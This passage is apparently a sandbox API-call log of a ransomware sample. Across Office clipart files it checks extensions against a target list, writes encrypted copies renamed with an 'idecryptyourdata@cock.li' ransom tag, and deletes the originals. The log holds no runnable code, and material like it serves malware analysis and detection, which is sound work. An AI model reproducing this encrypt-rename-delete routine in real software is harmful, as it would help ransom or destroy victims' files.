lstrlenW (lpString=".xls") returned 4 [0065.969] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.969] lstrlenW (lpString=".xlsx") returned 5 [0065.969] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.969] lstrlenW (lpString=".ppt") returned 4 [0065.969] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 68 [0065.969] lstrlenW (lpString=".zip") returned 4 [0065.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.969] lstrlenW (lpString=".rar") returned 4 [0065.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.969] lstrlenW (lpString=".bz2") returned 4 [0065.969] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.969] lstrlenW (lpString=".7z") returned 3 [0065.969] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 68 [0065.969] lstrlenW (lpString=".dbf") returned 4 [0065.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 68 [0065.969] lstrlenW (lpString=".1cd") returned 4 [0065.969] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 68 [0065.969] lstrlenW (lpString=".jpg") returned 4 [0065.969] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.970] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.970] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.970] GetLastError () returned 0x0 [0065.970] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x20e8, lpOverlapped=0x0) returned 1 [0066.128] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x20f0, lpOverlapped=0x0) returned 1 [0066.129] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.129] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.129] SetEndOfFile (hFile=0x2c8) returned 1 [0066.129] CloseHandle (hObject=0x2c8) returned 1 [0066.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.130] SetEndOfFile (hFile=0x368) returned 1 [0066.130] CloseHandle (hObject=0x368) returned 1 [0066.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf")) returned 1 [0066.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 68 [0066.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 68 [0066.133] lstrlenW (lpString=".doc") returned 4 [0066.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.133] lstrlenW (lpString=".docx") returned 5 [0066.133] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.133] lstrlenW (lpString=".pdf") returned 4 [0066.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.133] lstrlenW (lpString=".xls") returned 4 [0066.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.134] lstrlenW (lpString=".xlsx") returned 5 [0066.134] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.134] lstrlenW (lpString=".ppt") returned 4 [0066.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 68 [0066.134] lstrlenW (lpString=".zip") returned 4 [0066.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.134] lstrlenW (lpString=".rar") returned 4 [0066.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.134] lstrlenW (lpString=".bz2") returned 4 [0066.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.134] lstrlenW (lpString=".7z") returned 3 [0066.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 68 [0066.134] lstrlenW (lpString=".dbf") returned 4 [0066.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 68 [0066.134] lstrlenW (lpString=".1cd") returned 4 [0066.134] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 68 [0066.134] lstrlenW (lpString=".jpg") returned 4 [0066.134] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.135] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.135] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0066.139] GetLastError () returned 0x0 [0066.139] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x400c, lpOverlapped=0x0) returned 1 [0066.265] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4010, lpOverlapped=0x0) returned 1 [0066.266] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.266] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.266] SetEndOfFile (hFile=0x350) returned 1 [0066.266] CloseHandle (hObject=0x350) returned 1 [0066.266] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.266] SetEndOfFile (hFile=0x2c8) returned 1 [0066.267] CloseHandle (hObject=0x2c8) returned 1 [0066.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf")) returned 1 [0066.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 68 [0066.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 68 [0066.268] lstrlenW (lpString=".doc") returned 4 [0066.268] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.268] lstrlenW (lpString=".docx") returned 5 [0066.268] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.268] lstrlenW (lpString=".pdf") returned 4 [0066.268] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.268] lstrlenW (lpString=".xls") returned 4 [0066.268] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.268] lstrlenW (lpString=".xlsx") returned 5 [0066.268] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.268] lstrlenW (lpString=".ppt") returned 4 [0066.268] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 68 [0066.268] lstrlenW (lpString=".zip") returned 4 [0066.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.268] lstrlenW (lpString=".rar") returned 4 [0066.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.268] lstrlenW (lpString=".bz2") returned 4 [0066.268] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.269] lstrlenW (lpString=".7z") returned 3 [0066.269] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 68 [0066.269] lstrlenW (lpString=".dbf") returned 4 [0066.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 68 [0066.269] lstrlenW (lpString=".1cd") returned 4 [0066.269] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 68 [0066.269] lstrlenW (lpString=".jpg") returned 4 [0066.269] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.284] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.285] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.307] GetLastError () returned 0x0 [0066.307] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x22de, lpOverlapped=0x0) returned 1 [0066.309] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x22e0, lpOverlapped=0x0) returned 1 [0066.311] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.311] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.311] SetEndOfFile (hFile=0x370) returned 1 [0066.315] CloseHandle (hObject=0x370) returned 1 [0066.318] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.318] SetEndOfFile (hFile=0x354) returned 1 [0066.319] CloseHandle (hObject=0x354) returned 1 [0066.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf")) returned 1 [0066.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 68 [0066.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 68 [0066.320] lstrlenW (lpString=".doc") returned 4 [0066.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.320] lstrlenW (lpString=".docx") returned 5 [0066.320] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.320] lstrlenW (lpString=".pdf") returned 4 [0066.320] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.320] lstrlenW (lpString=".xls") returned 4 [0066.320] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.320] lstrlenW (lpString=".xlsx") returned 5 [0066.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.320] lstrlenW (lpString=".ppt") returned 4 [0066.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 68 [0066.320] lstrlenW (lpString=".zip") returned 4 [0066.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.320] lstrlenW (lpString=".rar") returned 4 [0066.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.321] lstrlenW (lpString=".bz2") returned 4 [0066.321] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.321] lstrlenW (lpString=".7z") returned 3 [0066.321] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 68 [0066.321] lstrlenW (lpString=".dbf") returned 4 [0066.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 68 [0066.321] lstrlenW (lpString=".1cd") returned 4 [0066.321] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 68 [0066.321] lstrlenW (lpString=".jpg") returned 4 [0066.321] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.321] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.321] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.322] GetLastError () returned 0x0 [0066.322] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x148c, lpOverlapped=0x0) returned 1 [0066.324] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1490, lpOverlapped=0x0) returned 1 [0066.325] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.325] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.325] SetEndOfFile (hFile=0x368) returned 1 [0066.325] CloseHandle (hObject=0x368) returned 1 [0066.325] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.325] SetEndOfFile (hFile=0x354) returned 1 [0066.327] CloseHandle (hObject=0x354) returned 1 [0066.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.327] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf")) returned 1 [0066.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 68 [0066.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 68 [0066.327] lstrlenW (lpString=".doc") returned 4 [0066.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString=".docx") returned 5 [0066.328] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.328] lstrlenW (lpString=".pdf") returned 4 [0066.328] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString=".xls") returned 4 [0066.328] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.328] lstrlenW (lpString=".xlsx") returned 5 [0066.328] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.328] lstrlenW (lpString=".ppt") returned 4 [0066.328] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 68 [0066.328] lstrlenW (lpString=".zip") returned 4 [0066.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.328] lstrlenW (lpString=".rar") returned 4 [0066.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString=".bz2") returned 4 [0066.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString=".7z") returned 3 [0066.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 68 [0066.328] lstrlenW (lpString=".dbf") returned 4 [0066.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 68 [0066.328] lstrlenW (lpString=".1cd") returned 4 [0066.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 68 [0066.328] lstrlenW (lpString=".jpg") returned 4 [0066.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.329] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.329] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.329] GetLastError () returned 0x0 [0066.329] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x380, lpOverlapped=0x0) returned 1 [0066.348] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x390, lpOverlapped=0x0) returned 1 [0066.349] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.349] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.350] SetEndOfFile (hFile=0x368) returned 1 [0066.350] CloseHandle (hObject=0x368) returned 1 [0066.350] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.350] SetEndOfFile (hFile=0x354) returned 1 [0066.351] CloseHandle (hObject=0x354) returned 1 [0066.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.351] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf")) returned 1 [0066.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 68 [0066.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 68 [0066.351] lstrlenW (lpString=".doc") returned 4 [0066.351] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.351] lstrlenW (lpString=".docx") returned 5 [0066.351] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.351] lstrlenW (lpString=".pdf") returned 4 [0066.351] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.351] lstrlenW (lpString=".xls") returned 4 [0066.352] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.352] lstrlenW (lpString=".xlsx") returned 5 [0066.352] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.352] lstrlenW (lpString=".ppt") returned 4 [0066.352] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 68 [0066.352] lstrlenW (lpString=".zip") returned 4 [0066.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.352] lstrlenW (lpString=".rar") returned 4 [0066.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.352] lstrlenW (lpString=".bz2") returned 4 [0066.352] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.352] lstrlenW (lpString=".7z") returned 3 [0066.352] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 68 [0066.352] lstrlenW (lpString=".dbf") returned 4 [0066.352] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 68 [0066.352] lstrlenW (lpString=".1cd") returned 4 [0066.352] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 68 [0066.352] lstrlenW (lpString=".jpg") returned 4 [0066.352] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.352] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.352] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, 